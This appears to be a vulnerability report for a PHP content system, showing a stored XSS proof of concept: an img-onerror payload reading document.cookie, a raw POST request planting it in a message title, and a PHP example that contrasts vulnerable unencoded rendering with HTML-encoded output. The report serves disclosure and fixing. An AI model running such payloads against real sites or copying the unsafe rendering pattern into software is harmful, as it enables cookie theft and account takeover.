Visit the URL: http://localhost/index.php?id=book

Input an XSS payload in the title parameter, such as:

```
<img src=x onerror=alert(document.cookie)>
```

```
POST /api.php?c=post&f=save HTTP/1.1
Host: localhost
Content-Length: 134
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/index.php?id=book
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_45afd0d5e0ac79310647ac6bc5b5e084=1540478711; UM_distinctid=1677dc16b8434a-05960abb8ab529-6313363-144000-1677dc16b866e; CNZZDATA1707573=cnzz_eid%3D1882766006-1544003086-http%253A%252F%252Flocalhost%252F%26ntime%3D1544024206; admin_auth=eyJpdiI6InZNKzdDV2E1cThadUxrcXZuakszeUE9PSIsInZhbHVlIjoiUVZmcmhkb3dSZDg3bk9YT3ViTmRFSWZUSWgwWVdLSjY5NUl3Wit6RWp5RGhpUHJib0RuaTMxc0N6UU1naXcrTnRHQmJOdnFkSTRXU0tHdDliRFZ4UkJSTkZuaFp4d1BYOTA1Z1ZKSkRINW5tQmo4TkdESERjbHdSQzJQQXlmMTEiLCJtYWMiOiJkMTljYjE1YWMwOWU4ODIzN2I5YTQ1ZjNlNjcwYzdiMDJiMWIyY2U5MmQ1MmFjOWJjYzE4Nzc3OTI2YmE1MmI3In0%3D; XDEBUG_SESSION=PHPSTORM; PHPSESSID=dngti2qdtfhmektapbh7c7et11; PHPSESSION=68qgk06qt2heoci271977dqut1
Connection: close

id=book&title=%3Cimg+src%3Dx+onrror%3Dalert(1)%3E&fullname=test&email=1%40qq.com&pic=&file=&_chkcode=4083&content=%3Cp%3E111%3C%2Fp%3E
```

When the administrator logs in and moves the mouse over to view the message information, it will trigger the payload.
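The report above comes down to a stored `title` value reaching the administrator's message view without output encoding. The following is an added example, not the project's code or its actual fix: it puts the unencoded rendering next to an encoded one, and the function names, the `<td title="...">` markup and the 120-character limit are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; the project's real admin template is not shown on this page.

/** Vulnerable pattern: the stored title is concatenated into markup as-is. */
function render_row_unsafe(array $msg): string
{
    return '<td title="' . $msg['title'] . '">' . $msg['title'] . '</td>';
}

/** Encode a value for HTML text and quoted-attribute contexts. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened pattern: every use of the title is encoded at output time. */
function render_row_safe(array $msg): string
{
    $t = h($msg['title']);
    return '<td title="' . $t . '">' . $t . '</td>';
}

/** Input side: the title is a plain-text field, so drop control characters and bound its length. */
function normalize_title(string $raw, int $max = 120): string
{
    // preg_replace returns null on invalid UTF-8; treat that as an empty title.
    $t = trim(preg_replace('/[\x00-\x1F\x7F]+/u', ' ', $raw) ?? '');
    return mb_substr($t, 0, $max, 'UTF-8'); // requires the mbstring extension
}

// Constructed sample: the title value from the report, as stored after URL-decoding.
$stored = ['title' => normalize_title('<img src=x onerror=alert(document.cookie)>')];

echo render_row_unsafe($stored), PHP_EOL; // tag from the title becomes live markup
echo render_row_safe($stored), PHP_EOL;   // same title is rendered as inert text

// The encoded title must not contain a raw angle bracket or quote.
if (strpbrk(h($stored['title']), '<>"\'') !== false) {
    throw new RuntimeException('title was not fully encoded');
}
```

Encoding at output time is what closes the injection; input normalization only narrows what gets stored. Setting the session cookies `HttpOnly` limits what `document.cookie` exposes but does not remove the injection itself.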
Received, fixed!